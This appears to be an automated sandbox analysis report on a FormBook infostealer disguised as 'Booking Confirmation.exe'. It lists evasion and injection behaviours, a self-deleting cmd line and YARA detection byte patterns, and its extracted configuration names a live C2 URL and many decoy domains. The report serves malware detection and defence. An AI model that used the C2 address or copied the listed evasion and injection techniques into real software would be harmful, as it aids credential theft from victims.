Play interactive tour

Edit tour

Analysis Report Booking Confirmation.exe

Overview

General Information

Sample Name:	Booking Confirmation.exe
Analysis ID:	356529
MD5:	78d9eadc9fcc580239b360ffa2c2220f
SHA1:	2bc313ca573a9be005aa8d22e96601c10dcd5041
SHA256:	e836c2aecd7a2ae83a5bb088780d9e7b8cd6c3a7ff6b9c3f1261bfd1f53dbef7
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large strings

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Booking Confirmation.exe (PID: 7100 cmdline: 'C:\Users\user\Desktop\Booking Confirmation.exe' MD5: 78D9EADC9FCC580239B360FFA2C2220F)

Booking Confirmation.exe (PID: 3716 cmdline: C:\Users\user\Desktop\Booking Confirmation.exe MD5: 78D9EADC9FCC580239B360FFA2C2220F)

Booking Confirmation.exe (PID: 612 cmdline: C:\Users\user\Desktop\Booking Confirmation.exe MD5: 78D9EADC9FCC580239B360FFA2C2220F)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

chkdsk.exe (PID: 5072 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)

cmd.exe (PID: 7024 cmdline: /c del 'C:\Users\user\Desktop\Booking Confirmation.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x287198:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x287412:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2b3fd8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2b4252:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x292f35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2bfd75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x292a21:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2bf861:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x293037:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2bfe77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x2931af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2bffef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x287e2a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x2b4c6a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x291c9c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2beadc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x288b23:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x2b5963:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x298bd7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x2c5a17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x299bda:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x295cb9:$sqlite3step: 68 34 1C 7B E1 0x295dcc:$sqlite3step: 68 34 1C 7B E1 0x2c2af9:$sqlite3step: 68 34 1C 7B E1 0x2c2c0c:$sqlite3step: 68 34 1C 7B E1 0x295ce8:$sqlite3text: 68 38 2A 90 C5 0x295e0d:$sqlite3text: 68 38 2A 90 C5 0x2c2b28:$sqlite3text: 68 38 2A 90 C5 0x2c2c4d:$sqlite3text: 68 38 2A 90 C5 0x295cfb:$sqlite3blob: 68 53 D8 7F 8C 0x295e23:$sqlite3blob: 68 53 D8 7F 8C 0x2c2b3b:$sqlite3blob: 68 53 D8 7F 8C 0x2c2c63:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Booking Confirmation.exe PID: 7100	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.Booking Confirmation.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.Booking Confirmation.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.Booking Confirmation.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x13bbb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13be32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1689f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x168c72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x147955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x174795:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x147441:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x174281:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x174897:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x147bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x174a0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13c84a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16968a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1466bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1734fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x13d543:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x16a383:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x14d5f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x17a437:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x14e5fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x14a6d9:$sqlite3step: 68 34 1C 7B E1 0x14a7ec:$sqlite3step: 68 34 1C 7B E1 0x177519:$sqlite3step: 68 34 1C 7B E1 0x17762c:$sqlite3step: 68 34 1C 7B E1 0x14a708:$sqlite3text: 68 38 2A 90 C5 0x14a82d:$sqlite3text: 68 38 2A 90 C5 0x177548:$sqlite3text: 68 38 2A 90 C5 0x17766d:$sqlite3text: 68 38 2A 90 C5 0x14a71b:$sqlite3blob: 68 53 D8 7F 8C 0x14a843:$sqlite3blob: 68 53 D8 7F 8C 0x17755b:$sqlite3blob: 68 53 D8 7F 8C 0x177683:$sqlite3blob: 68 53 D8 7F 8C
5.2.Booking Confirmation.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.Booking Confirmation.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.Booking Confirmation.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
0.2.Booking Confirmation.exe.26148e8.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.Booking Confirmation.exe.3739600.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Booking Confirmation.exe.3739600.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xe6b98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe6e12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1139d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x113c52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf2935:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x11f775:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf2421:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x11f261:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf2a37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x11f877:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf2baf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11f9ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe782a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11466a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf169c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x11e4dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xe8523:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x115363:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xf85d7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x125417:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xf95da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Booking Confirmation.exe.3739600.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xf56b9:$sqlite3step: 68 34 1C 7B E1 0xf57cc:$sqlite3step: 68 34 1C 7B E1 0x1224f9:$sqlite3step: 68 34 1C 7B E1 0x12260c:$sqlite3step: 68 34 1C 7B E1 0xf56e8:$sqlite3text: 68 38 2A 90 C5 0xf580d:$sqlite3text: 68 38 2A 90 C5 0x122528:$sqlite3text: 68 38 2A 90 C5 0x12264d:$sqlite3text: 68 38 2A 90 C5 0xf56fb:$sqlite3blob: 68 53 D8 7F 8C 0xf5823:$sqlite3blob: 68 53 D8 7F 8C 0x12253b:$sqlite3blob: 68 53 D8 7F 8C 0x122663:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 8 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack

Malware Configuration Extractor: FormBook {"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Booking Confirmation.exe

ReversingLabs: Detection: 33%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: Booking Confirmation.exe

Joe Sandbox ML: detected

Source: 5.2.Booking Confirmation.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Show sources

Source: Booking Confirmation.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: Booking Confirmation.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: chkdsk.pdbGCTL source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: chkdsk.pdb source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: Booking Confirmation.exe, 00000005.00000002.710355206.000000000195F000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Booking Confirmation.exe, chkdsk.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp

Networking:

